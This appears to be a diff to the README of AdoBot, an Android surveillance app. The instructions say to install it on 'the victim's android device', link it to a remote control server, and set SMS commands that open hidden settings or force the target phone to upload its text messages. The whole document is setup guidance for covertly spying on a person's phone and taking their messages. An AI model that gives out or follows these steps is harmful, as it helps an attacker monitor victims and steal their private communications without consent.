adonespitogo/AdoBot/README.md

 # Instructions

 Just compile (as signed APK) and install the app to the victim's android device.
-Then start the app and set the URL of your [AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) server.
+Then start the app and configure the parameters:

+Server URL: Set the URL of your [AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) server.
+It must include the protocol i.e. `https://adobot.herokuapp.com`.
+SMS Open Command: Send an SMS to any number containing this text to open the Adobot settings.
+Upload SMS Command: Send an SMS containing this text to the target phone to forcefully upload messages.

 Next go to [https://github.com/adonespitogo/AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) and follow the instructions on setting up the admin panel.